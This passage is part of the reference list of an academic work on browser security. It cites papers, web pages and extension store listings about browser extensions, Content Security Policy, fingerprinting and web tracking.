detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en-US.
[141] uBlock Origin - Firefox Extension. https://addons.mozilla.org/en-US/firefox/
addon/ublock-origin/?src=search.
[142] uBlock Origin - Opera Extension. https://addons.opera.com/en/search/?query=
kccohkcpppjjkkjppopfnflnebibpida.
[143] URI - Uniform Resource Identifier. https://en.wikipedia.org/wiki/Uniform_
Resource_Identifier.
[144] URL. https://www.w3.org/TR/url.
[145] URLSearchParams API. https://developer.mozilla.org/en-US/docs/Web/API/
URLSearchParams.
[146] User-Agent Switcher - Firefox Extensions. https://addons.mozilla.org/en-US/
firefox/addon/user-agent-switcher-revived/.
[147] User-Agent Switcher for Chrome - Chrome Extension. https:
//chrome.google.com/webstore/detail/user-agent-switcher-for-c/
djflhoibgkdhkhhcedjiklpkjnoahfmg.
[148] Using CORS - HTML5 Rocks. https://www.html5rocks.com/en/tutorials/
cors/.
[149] Using Service Workers. https://developer.mozilla.org/en-US/docs/Web/API/
Service_Worker_API/Using_Service_Workers.
[150] Using Web Workers. https://developer.mozilla.org/en-US/docs/Web/API/Web_
Workers_API/Using_web_workers.
[151] VisualSP Training for Office 365 - Chrome Extension. https:
//chrome.google.com/webstore/detail/visualsp-training-for-off/
ohdihpdgfenligmhnmldmiabdhflokkh.
[152] WebExtensions web_accessible_resources. https://developer.mozilla.org/
en-US/Add-ons/WebExtensions/manifest.json/web_accessible_resources.
[153] Webstats - Various statistics about top 10,000 Alexa sites. https://webstats.
inria.fr/.
[154] Window. https://developer.mozilla.org/en-US/docs/Web/API/Window.
[155] XMLHttpRequest. https://developer.mozilla.org/en-US/docs/Web/API/
XMLHttpRequest.
[156] XPCOM Interfaces. https://developer.mozilla.org/en-US/docs/Mozilla/
Tech/XUL/Tutorial/XPCOM_Interfaces.
[157] Youtube website. https://www.youtube.com/.
[158] ZenMate VPN - Best Cyber Security & Unblock - Chrome Extension.
https://chrome.google.com/webstore/detail/zenmate-vpn-best-cyber-se/
fdcgdnkidjaadafnichfpabhfomcebme.
[159] ZenMate VPN - Opera Extension. https://addons.opera.com/en/search/?query=
cnhbkkedmelfmalgjpkngiaoifpdfcnl.
[160] ZenMate VPN for Firefox - Firefox Extension. https://addons.mozilla.org/
en-US/firefox/addon/zenmate-vpn/.
[161] European Commission Law on Cookies, 2012. http://ec.europa.eu/ipg/basics/
legal/cookies/index_en.htm.
[162] Webstats - Use of Content Security Policy and Cookies in top 10,000 Alexa sites,
2016. https://webstats.inria.fr/popsecurity.php.
[163] Erwan Abgrall, Yves Le Traon, Martin Monperrus, Sylvain Gombault, Mario Hei-
derich, and Alain Ribault. XSS-FP: browser fingerprinting using HTML parser
quirks. CoRR, 2012.
[164] Gunes Acar, Christian Eubank, Steven Englehardt, Marc Juárez, Arvind Narayanan,
and Claudia Díaz. The web never forgets: Persistent tracking mechanisms in the wild.
In Proc. of CCS 2014.
[165] Gunes Acar, Marc Juárez, Nick Nikiforakis, Claudia Díaz, Seda F. Gürses, Frank
Piessens, and Bart Preneel. FPDetective: dusting the web for fingerprinters. In
Proc. of CCS 2013.
[166] Jagdish Prasad Achara, Gergely Ács, and Claude Castelluccia. On the unicity of
smartphone applications. CoRR, abs/1507.07851, 2015.
[167] Jagdish Prasad Achara, Javier Parra-Arnau, and Claude Castelluccia. Mytracking-
choices: Pacifying the ad-block war by enforcing user privacy preferences. CoRR,
2016.
[168] Steven Van Acker, Daniel Hausknecht, and Andrei Sabelfeld. Data Exfiltration in
the Face of CSP. In Xiaofeng Chen, XiaoFeng Wang, and Xinyi Huang, editors,
Proceedings of the 11th ACM on Asia Conference on Computer and Communications
Security, AsiaCCS 2016, Xi’an, China, May 30 - June 3, 2016, pages 853–864. ACM,
2016.
[169] Tom Anthony. Detect if visitors are logged into twitter, facebook or google+. http:
//www.tomanthony.co.uk/blog/detect-visitor-social-networks/, 2012.
[170] Sruthi Bandhakavi, Samuel T. King, P. Madhusudan, and Marianne Winslett. VEX:
vetting browser extensions for security vulnerabilities. In 19th USENIX Security
Symposium, Washington, DC, USA, August 11-13, 2010, Proceedings, pages 339–
354. USENIX Association, 2010.
[171] Rick Barrett, Rick Cummings, Eugene Agichtein, and Evgeniy Gabrilovich, editors.
Proceedings of the 26th International Conference on World Wide Web, WWW 2017,
Perth, Australia, April 3-7, 2017. ACM, 2017.
[172] Adam Barth, Adrienne Porter Felt, Prateek Saxena, and Aaron Boodman. Protecting
browsers from extension vulnerabilities. In Proceedings of the Network and Distributed
System Security Symposium, NDSS 2010, San Diego, California, USA, 28th February
- 3rd March 2010. The Internet Society, 2010.
[173] Károly Boda, Ádám Máté Földes, Gábor György Gulyás, and Sándor Imre. User
tracking on the web via cross-browser fingerprinting. In Proc. of the 16th NordSec,
pages 31–46, 2011.
[174] Eric Bodden, Mathias Payer, and Elias Athanasopoulos, editors. Engineering Secure
Software and Systems - 9th International Symposium, ESSoS 2017, Bonn, Germany,
July 3-5, 2017, Proceedings, volume 10379 of Lecture Notes in Computer Science.
Springer, 2017.
[175] Matthew Bryant. Dirty browser enumeration tricks - using chrome://
and about: to detect firefox and addons. https://thehackerblog.com/
dirty-browser-enumeration-tricks-using-chrome-and-about-to-detect-firefox-plugins/
index.html, 2014.
[176] Stefano Calzavara, Michele Bugliesi, Silvia Crafa, and Enrico Steffinlongo. Fine-
grained detection of privilege escalation attacks on browser extensions. In Jan Vitek,
editor, Programming Languages and Systems - 24th European Symposium on Pro-
gramming, ESOP 2015, Held as Part of the European Joint Conferences on Theory
and Practice of Software, ETAPS 2015, London, UK, April 11-18, 2015. Proceedings,
volume 9032 of Lecture Notes in Computer Science, pages 510–534. Springer, 2015.
[177] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. Content Security Problems?:
Evaluating the Effectiveness of Content Security Policy in the Wild. In Weippl
et al. [268], pages 1365–1375.
[178] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. CCSP: controlled relaxation
of content security policies by runtime policy composition. In Kirda and Ristenpart
[215], pages 695–712.
[179] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. Semantics-based analysis
of content security policy deployment. ACM Trans. Web, 12(2):10:1–10:36, January
2017.
[180] Yinzhi Cao, Song Li, and Erik Wijmans. (cross-)browser fingerprinting via os and
hardware level features. In Proc. of the 24th NDSS, 2017.
[181] Nicholas Carlini, Adrienne Porter Felt, and David A. Wagner. An evaluation of the
google chrome extension security architecture. In Tadayoshi Kohno, editor, Proceed-
ings of the 21st USENIX Security Symposium, Bellevue, WA, USA, August 8-10,
2012, pages 97–111. USENIX Association, 2012.
[182] Giovanni Cattani. The evolution of chrome extensions detection. http://blog.
beefproject.com/2013/04/the-evolution-of-chrome-extensions.html, 2013.
[183] Yves-Alexandre de Montjoye, César A. Hidalgo, Michel Verleysen, and Vincent D.
Blondel. Unique in the crowd: The privacy bounds of human mobility. Scientific
Reports, 3:1376 EP –, 2013.
[184] Adam Doupé, Weidong Cui, Mariusz H. Jakubowski, Marcus Peinado, Christopher
Kruegel, and Giovanni Vigna. deDacota: toward preventing server-side XSS via au-
tomatic code and data separation. In Ahmad-Reza Sadeghi, Virgil D. Gligor, and
Moti Yung, editors, 2013 ACM SIGSAC Conference on Computer and Communi-
cations Security, CCS’13, Berlin, Germany, November 4-8, 2013, pages 1205–1216.
ACM, 2013.
[185] Peter Eckersley. How Unique Is Your Web Browser? In Proc. of the 2010 PETS.
[186] Manuel Egele, Christopher Kruegel, Engin Kirda, Heng Yin, and Dawn Xiaodong
Song. Dynamic spyware analysis. In Proceedings of the 2007 USENIX Annual Tech-
nical Conference, Santa Clara, CA, USA, June 17-22, 2007, pages 233–246, 2007.
[187] Ahmed Elsobky. Novel techniques for user deanonymization attacks. https:
//0xsobky.github.io/novel-deanonymization-techniques/, 2016.
[188] Steven Englehardt and Arvind Narayanan. Online tracking: A 1-million-site mea-
surement and analysis. In Proc. of the 2016 CCS, pages 1388–1401, 2016.
[189] Steven Englehardt, Dillon Reisman, Christian Eubank, Peter Zimmerman, Jonathan
Mayer, Arvind Narayanan, and Edward W. Felten. Cookies that give you away: The
surveillance implications of web tracking. In Proc. of the 24th WWW, pages 289–299,
2015.
[190] H. Gamboa, A. L. N. Fred, and A. K. Jain. Webbiometrics: User verification via web
interaction. In 2007 Biometrics Symposium, pages 1–6, 2007.
[191] Alejandro Gómez-Boix, Pierre Laperdrix, and Benoit Baudry. Hiding in the crowd:
an analysis of the effectiveness of browser fingerprinting at large scale. In Pierre-
Antoine Champin, Fabien L. Gandon, Mounia Lalmas, and Panagiotis G. Ipeirotis,
editors, Proceedings of the 2018 World Wide Web Conference on World Wide Web,
WWW 2018, Lyon, France, April 23-27, 2018, pages 309–318. ACM, 2018.
[192] Willem De Groef. Client- and Server-Side Security Technologies for JavaScript Web
Applications ; Beveiligingstechnologiën voor webapplicaties in JavaScript. PhD thesis,
Katholieke Universiteit Leuven, Belgium, 2016.
[193] Jeremiah Grossman. I know what you’ve got (firefox extensions). http://blog.
jeremiahgrossman.com/2006/08/i-know-what-youve-got-firefox.html, 2006.
[194] Jeremiah Grossman. Login detection, whose problem is it? http://blog.
jeremiahgrossman.com/2008/03/login-detection-whose-problem-is-it.html,
2008.
[195] Arjun Guha, Matthew Fredrikson, Benjamin Livshits, and Nikhil Swamy. Verified
security for browser extensions. In 32nd IEEE Symposium on Security and Privacy,
S&P 2011, 22-25 May 2011, Berkeley, California, USA, pages 115–130. IEEE Com-
puter Society, 2011.
[196] Gábor György Gulyás, Gergely Acs, and Claude Castelluccia. Code repository for
paper titled ’near-optimal fingerprinting with constraints’. https://github.com/
gaborgulyas/constrainted_fingerprinting, 2016.
[197] Gábor György Gulyás, Gergely Acs, and Claude Castelluccia. Near-optimal fin-
gerprinting with constraints. Proceedings on Privacy Enhancing Technologies,
2016(4):470–487, 2016.
[198] Gábor György Gulyás, Dolière Francis Somé, Nataliia Bielova, and Claude Castel-
luccia. To extend or not to extend: on the uniqueness of browser extensions and web
logins. In To appear in the Proceedings of the 2018 ACM on Workshop on Privacy in
the Electronic Society, WPES@CCS 2018, Toronto, Canada, October 15 - 19, 2018,
2018.
[199] Jonas Haag. Modern and flexible browser fingerprinting library. https://github.
com/Valve/fingerprintjs2.
[200] Daniel Hausknecht, Jonas Magazinius, and Andrei Sabelfeld. May I? - Content Se-
curity Policy Endorsement for Browser Extensions. In Magnus Almgren, Vincenzo
Gulisano, and Federico Maggi, editors, Detection of Intrusions and Malware, and Vul-
nerability Assessment - 12th International Conference, DIMVA 2015, Milan, Italy,
July 9-10, 2015, Proceedings, volume 9148 of Lecture Notes in Computer Science,
pages 261–281. Springer, 2015.
[201] Brian Hayes. Uniquely me! How much information does it take to single out one
person among billions? 102:106–109, 2014.
[202] Stefan Heule, Devon Rifkin, Alejandro Russo, and Deian Stefan. The most dangerous
code in the browser. In George Candea, editor, 15th Workshop on Hot Topics in
Operating Systems, HotOS XV, Kartause Ittingen, Switzerland, May 18-20, 2015.
USENIX Association, 2015.
[203] Ian Hickson, Robin Berjon, Steve Faulkner, Travis Leithead, Erika Doyle Navara,
Edward O’Connor, and Silvia Pfeiffer. HTML5. A vocabulary and associated APIs
for HTML and XHTML. W3C Recommendation, 2014. https://www.w3.org/TR/
html5/embedded-content-0.html#an-iframe-srcdoc-document.
[204] Ariya Hidayat. ECMAScript Parsing Infrastructure. https://www.npmjs.com/
package/esprima.
[205] Ariya Hidayat. PhantomJS Headless Browser, 2010-2016. http://www.phantomjs.
org/.
[206] Egor Homakov. Using content-security-policy for evil. http://homakov.blogspot.
fr/2014/01/using-content-security-policy-for-evil.html, 2014.
[207] Egor Homakov. Profilejacking - legal tricks to detect user profile. https://sakurity.
com/blog/2015/03/10/Profilejacking.html, 2015.
[208] Collin Jackson and Adam Barth. Beware of Finer-Grained Origins. In Web 2.0
Security and Privacy (W2SP 2008), 2008.
[209] Ashar Javed. CSP Aider: An Automated Recommendation of Content Security
Policy for Web Applications. In IEEE Oakland Web 2.0 Security and Privacy
(W2SP’12), 2012.
[210] Simon Holm Jensen, Peter A. Jonsson, and Anders Møller. Remedying the eval
that men do. In Mats Per Erik Heimdahl and Zhendong Su, editors, International
Symposium on Software Testing and Analysis, ISSTA 2012, Minneapolis, MN, USA,
July 15-20, 2012, pages 34–44. ACM, 2012.
[211] Martin Johns. Preparedjs: Secure script-templates for javascript. In Rieck et al. [241],
pages 102–121.
[212] Martin Johns. Script-templates for the content security policy. J. Inf. Sec. Appl.,
19(3):209–223, 2014.
[213] Alexandros Kapravelos, Chris Grier, Neha Chachra, Christopher Kruegel, Giovanni
Vigna, and Vern Paxson. Hulk: Eliciting malicious behavior in browser extensions.
In Kevin Fu and Jaeyeon Jung, editors, Proceedings of the 23rd USENIX Security
Symposium, San Diego, CA, USA, August 20-22, 2014., pages 641–654. USENIX
Association, 2014.
[214] Christoph Kerschbaumer, Sid Stamm, and Stefan Brunthaler. Injecting CSP for Fun
and Security. In Olivier Camp, Steven Furnell, and Paolo Mori, editors, Proceedings
of the 2nd International Conference on Information Systems Security and Privacy
(ICISSP 2016), Rome, Italy, February 19-21, 2016., pages 15–25. SciTePress, 2016.
[215] Engin Kirda and Thomas Ristenpart, editors. 26th USENIX Security Symposium,
USENIX Security 2017, Vancouver, BC, Canada, August 16-18, 2017. USENIX As-
sociation, 2017.
[216] Krzysztof Kotowicz. Intro to chrome addons hacking: fingerprinting. http://blog.
kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html, 2012.
[217] Balachander Krishnamurthy and Craig E. Wills. Privacy diffusion on the web: a
longitudinal perspective. In Proc. of the 18th WWW, pages 541–550, 2009.
[218] Pierre Laperdrix. Browser Fingerprinting: Exploring Device Diversity to Aug-
ment Authentication and Build Client-Side Countermeasures. (Empreinte digitale
d’appareil: exploration de la diversité des terminaux modernes pour renforcer
l’authentification en ligne et construire des contremesures côté client). PhD thesis,
INSA Rennes, France, 2017.
[219] Pierre Laperdrix, Benoit Baudry, and Vikas Mishra. Fprandom: Randomizing core
browser objects to break advanced device fingerprinting techniques. In Bodden et al.
[174], pages 97–114.
[220] Pierre Laperdrix, Walter Rudametkin, and Benoit Baudry. Mitigating browser fin-
gerprint tracking: Multi-level reconfiguration and diversification. In Paola Inverardi
and Bradley R. Schmerl, editors, 10th IEEE/ACM International Symposium on Soft-
ware Engineering for Adaptive and Self-Managing Systems, SEAMS 2015, Florence,
Italy, May 18-19, 2015, pages 98–108. IEEE Computer Society, 2015.
[221] Pierre Laperdrix, Walter Rudametkin, and Benoit Baudry. Beauty and the beast:
Diverting modern web browsers to build unique browser fingerprints. In IEEE Sym-
posium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016,
pages 878–894. IEEE Computer Society, 2016.
[222] Adam Lerner, Anna Kornfeld Simpson, Tadayoshi Kohno, and Franziska Roesner.
Internet jones and the raiders of the lost trackers: An archaeological study of web
tracking from 1996 to 2016. In Proc. of the 25th USENIX Security, 2016.
[223] Robin Linus. Your social media fingerprint. https://robinlinus.github.io/
socialmedia-leak/, 2016.
[224] Mike Ter Louw, Jin Soon Lim, and V. N. Venkatakrishnan. Extensible web browser
security. In Bernhard M. Hämmerli and Robin Sommer, editors, Detection of In-
trusions and Malware, and Vulnerability Assessment, 4th International Conference,
DIMVA 2007, Lucerne, Switzerland, July 12-13, 2007, Proceedings, volume 4579 of
Lecture Notes in Computer Science, pages 1–19. Springer, 2007.
[225] Jonathan R. Mayer and John C. Mitchell. Third-party web tracking: Policy and
technology. In Proc. of the 2012 IEEE SP, pages 413–427, 2012.
[226] Georg Merzdovnik, Markus Huber, Damjan Buhov, Nick Nikiforakis, Sebastian Ne-
uner, Martin Schmiedecker, and Edgar Weippl. Block me if you can: A large-scale
study of tracker-blocking tools. In Proc. of the 2nd EuroSP, Paris, France, 2017.
[227] Keaton Mowery and Hovav Shacham. Pixel perfect: Fingerprinting canvas in
HTML5. In Matt Fredrikson, editor, Proceedings of W2SP 2012. IEEE Computer
Society, May 2012.
[228] Ben Newman. JavaScript Syntax Tree Transformer. https://www.npmjs.com/
package/recast.
[229] Nick Nikiforakis, Luca Invernizzi, Alexandros Kapravelos, Steven Van Acker, Wouter
Joosen, Christopher Kruegel, Frank Piessens, and Giovanni Vigna. You are what you
include: large-scale evaluation of remote javascript inclusions. In Proc. of the 2012
CCS, pages 736–747, 2012.
[230] Nick Nikiforakis, Alexandros Kapravelos, Wouter Joosen, Christopher Kruegel, Frank
Piessens, and Giovanni Vigna. Cookieless monster: Exploring the ecosystem of web-
based device fingerprinting. In 2013 IEEE Symposium on Security and Privacy, SP
2013, Berkeley, CA, USA, May 19-22, 2013, pages 541–555. IEEE Computer Society,
2013.
[231] Łukasz Olejnik, Claude Castelluccia, and Artur Janc. Why Johnny can’t browse in
peace: On the uniqueness of web browsing history patterns. In Hot Topics in Privacy
Enhancing Technologies (HotPETs 2012), July 2012.
[232] Kaan Onarlioglu, Mustafa Battal, William K. Robertson, and Engin Kirda. Securing
legacy firefox extensions with SENTINEL. In Rieck et al. [241], pages 122–138.
[233] Kaan Onarlioglu, Ahmet Salih Buyukkayhan, William K. Robertson, and Engin
Kirda. SENTINEL: securing legacy firefox extensions. Computers & Security, 49:147–
161, 2015.
[234] Xiang Pan, Yinzhi Cao, and Yan Chen. I do not know what you visited last summer:
Protecting users from stateful third-party web tracking with trackingfree browser. In
Proc. of the 22nd NDSS, 2015.
[235] Xiang Pan, Yinzhi Cao, Shuangping Liu, Yu Zhou, Yan Chen, and Tingzhe Zhou.
CSPAutoGen: Black-box Enforcement of Content Security Policy upon Real-world
Websites. In Weippl et al. [268], pages 653–665.
[236] Kailas Patil and Frederik Braun. A Measurement Study of the Content Security
Policy on Real-World Applications. I. J. Network Security, 18(2):383–392, 2016.
[237] Ian Paul. Firefox will stop supporting plugins by end of 2016, follow-
ing chrome’s lead. https://www.pcworld.com/article/2990991/browsers/
firefox-will-stop-supporting-npapi-plugins-by-end-of-2016-following-chromes-lead.
html.
[238] Nicolas Perriault. CasperJS navigation and scripting tool for PhantomJS, 2011-2016.
http://www.casperjs.org/.
[239] M. Pusara and C. Brodley. User re-authentication via mouse movements. In ACM
Workshop Visualizat. Data Mining Comput. Security, pages 1–8, 2004.
[240] Gregor Richards, Christian Hammer, Brian Burg, and Jan Vitek. The eval that
men do - A large-scale study of the use of eval in javascript applications. In Mira
Mezini, editor, ECOOP 2011 - Object-Oriented Programming - 25th European Con-
ference, Lancaster, UK, July 25-29, 2011 Proceedings, volume 6813 of Lecture Notes
in Computer Science, pages 52–78. Springer, 2011.
[241] Konrad Rieck, Patrick Stewin, and Jean-Pierre Seifert, editors. Detection of Intru-
sions and Malware, and Vulnerability Assessment - 10th International Conference,
DIMVA 2013, Berlin, Germany, July 18-19, 2013. Proceedings, volume 7967 of Lec-
ture Notes in Computer Science. Springer, 2013.
[242] Franziska Roesner, Tadayoshi Kohno, and David Wetherall. Detecting and defending
against third-party tracking on the web. In Proc. of the 9th NSDI, pages 155–168,
2012.
[243] Joseph Roth, Xiaoming Liu, and Dimitris Metaxas. On continuous user authentica-
tion via typing behavior. 23(10):4611–4624, 2014.
[244] Gustav Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson. Busting frame
busting: a study of clickjacking vulnerabilities at popular sites. In IEEE Oakland
Web 2.0 Security and Privacy (W2SP 2010), 2010.
[245] Iskander Sánchez-Rola, Igor Santos, and Davide Balzarotti. Extension breakdown:
Security analysis of browsers extension resources control policies. In Kirda and Ris-
tenpart [215], pages 679–694.
[246] Justin Schuh. Saying Goodbye to Our Old Friend
NPAPI, September 2013. https://blog.chromium.org/2013/09/
saying-goodbye-to-our-old-friend-npapi.html.
[247] Manuel Serrano. Hop.js - Multi-tier JavaScript. http://hop.inria.fr/home/index.
html.
[248] Kapil Singh, Alexander Moshchuk, Helen J. Wang, and Wenke Lee. On the In-
coherencies in Web Browser Access Control Policies. In 31st IEEE Symposium on
Security and Privacy, S&P 2010, 16-19 May 2010, Berkeley/Oakland, California,
USA, pages 463–478, 2010.
[249] Alexander Sjösten, Steven Van Acker, and Andrei Sabelfeld. Discovering browser
extensions via web accessible resources. In Gail-Joon Ahn, Alexander Pretschner,
and Gabriel Ghinita, editors, Proceedings of the Seventh ACM on Conference on
Data and Application Security and Privacy, CODASPY 2017, Scottsdale, AZ, USA,
March 22-24, 2017, pages 329–336. ACM, 2017.
[250] Ashkan Soltani, Shannon Canty, Quentin Mayo, Lauren Thomas, and Chris Jay
Hoofnagle. Flash Cookies and Privacy. In AAAI spring symposium: intelligent
information privacy management, pages 158–163, 2010.
[251] Dolière Francis Somé. Breaking the Same Origin Policy for free - On CORS headers
manipulations by browser extensions. Submitted for review.
[252] Dolière Francis Somé. EmPoWeb: Empowering web applications with browser ex-
tensions. Submitted for review.
[253] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the Content Security
Policy violations due to the Same-Origin Policy. Technical report. http://www-sop.
inria.fr/members/Nataliia.Bielova/papers/CSP-SOP.pdf.
[254] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. Control what you include!
- server-side protection against third party web tracking. In Bodden et al. [174], pages
115–132.
[255] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the content security
policy violations due to the same-origin policy. In Barrett et al. [171], pages 877–886.
[256] Dolière Francis Somé and Tamara Rezk. DF-CSP: Dependency-Free Content Security
Policy. Submitted for review.
[257] Dolière Francis Somé and Tamara Rezk. Extending Content Security Policy: Black-
listing, URL arguments filtering and Monitoring. Submitted for review.
[258] Sid Stamm, Brandon Sterne, and Gervase Markham. Reining in the web with con-
tent security policy. In Michael Rappa, Paul Jones, Juliana Freire, and Soumen
Chakrabarti, editors, Proceedings of the 19th International Conference on World
Wide Web, WWW 2010, Raleigh, North Carolina, USA, April 26-30, 2010, pages
921–930. ACM, 2010.
[259] Oleksii Starov and Nick Nikiforakis. Extended tracking powers: Measuring the pri-
vacy diffusion enabled by browser extensions. In Barrett et al. [171], pages 1481–1490.
[260] Oleksii Starov and Nick Nikiforakis. XHOUND: quantifying the fingerprintability of
browser extensions. In 2017 IEEE Symposium on Security and Privacy, SP 2017,
San Jose, CA, USA, May 22-26, 2017, pages 941–956. IEEE Computer Society, 2017.
[261] Brandon Sterne and Adam Barth. Content Security Policy 1.0. W3C Candidate
Recommendation, 2012. http://www.w3.org/TR/2012/CR-CSP-20121115/.
[262] Nikhil Swamy, Cédric Fournet, Aseem Rastogi, Karthikeyan Bhargavan, Juan Chen,
Pierre-Yves Strub, and Gavin M. Bierman. Gradual typing embedded securely in
JavaScript. In Suresh Jagannathan and Peter Sewell, editors, The 41st Annual ACM
SIGPLAN-SIGACT Symposium on Principles of Programming Languages, POPL
’14, San Diego, CA, USA, January 20-21, 2014, pages 425–438. ACM, 2014.
[263] Naoki Takei, Takamichi Saito, Ko Takasu, and Tomotaka Yamada. Web browser
fingerprinting using only cascading style sheets. In Proc. of the 10th BWCCA, pages
57–63, 2015.
[264] Randika Upathilake, Yingkun Li, and Ashraf Matrawy. A classification of web
browser fingerprinting techniques. In Proc. of the 7th NTMS, pages 1–5, 2015.
[265] Anne van Kesteren. Cross Origin Resource Sharing. W3C Recommendation, 2014.
https://www.w3.org/TR/cors/.
[266] Antoine Vastel, Pierre Laperdrix, Walter Rudametkin, and Romain Rouvoy. FP-
STALKER: tracking browser fingerprint evolutions. In 2018 IEEE Symposium on
Security and Privacy, SP 2018, Proceedings, 21-23 May 2018, San Francisco, Cali-
fornia, USA, pages 728–741. IEEE, 2018.
[267] Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, and Artur Janc. CSP Is
Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content
Security Policy. In Weippl et al. [268], pages 1376–1387.
[268] Edgar R. Weippl, Stefan Katzenbeisser, Christopher Kruegel, Andrew C. Myers, and
Shai Halevi, editors. Proceedings of the 2016 ACM SIGSAC Conference on Computer
and Communications Security, Vienna, Austria, October 24-28, 2016. ACM, 2016.
[269] Michael Weissbacher, Tobias Lauinger, and William K. Robertson. Why Is CSP
Failing? Trends and Challenges in CSP Adoption. In Research in Attacks, Intrusions
and Defenses - 17th International Symposium, RAID 2014, Gothenburg, Sweden,
September 17-19, 2014. Proceedings, pages 212–233, 2014.
[270] Michael Weissbacher, Enrico Mariconti, Guillermo Suarez-Tangil, Gianluca Stringh-
ini, William K. Robertson, and Engin Kirda. Ex-ray: Detection of history-leaking
browser extensions. In Proceedings of the 33rd Annual Computer Security Applica-
tions Conference, Orlando, FL, USA, December 4-8, 2017, pages 590–602. ACM,
2017.
[271] Mike West. Content Security Policy: Embedded Enforcement, 2016. https://w3c.
github.io/webappsec-csp/embedded/.
[272] Mike West. Content Security Policy Level 3. W3C Working Draft, 2016. http:
//www.w3.org/TR/CSP3/.
[273] Mike West. Mixed Content, 2016. https://www.w3.org/TR/mixed-content/.
[274] Mike West. Origin Policy. A Collection of Interesting Ideas, 2016. https://wicg.
github.io/origin-policy/.
[275] Mike West, Adam Barth, and Dan Veditz. Content Security Policy Level 2. W3C
Candidate Recommendation, 2015. http://www.w3.org/TR/CSP2/.
[276] Mike West and Ilya Grigorik. Feature Policy. W3C Draft Community Group Report,
2016. https://wicg.github.io/feature-policy/.
[277] Rob Wu. CRX Extension Source Viewer For Chrome, Opera, and Firefox. https:
//robwu.nl/crxviewer/.
[278] Imran Yusof and Al-Sakib Khan Pathan. Mitigating Cross-Site Scripting Attacks
with a Content Security Policy. IEEE Computer, 49(3):56–63, 2016.
[279] Yu Zhong, Yunbin Deng, and Anil K. Jain. Keystroke dynamics for user authentica-
tion. In 2012 IEEE Computer Society Conference on Computer Vision and Pattern
Recognition Workshops, Providence, RI, USA, June 16-21, 2012, pages 117–123,
2012.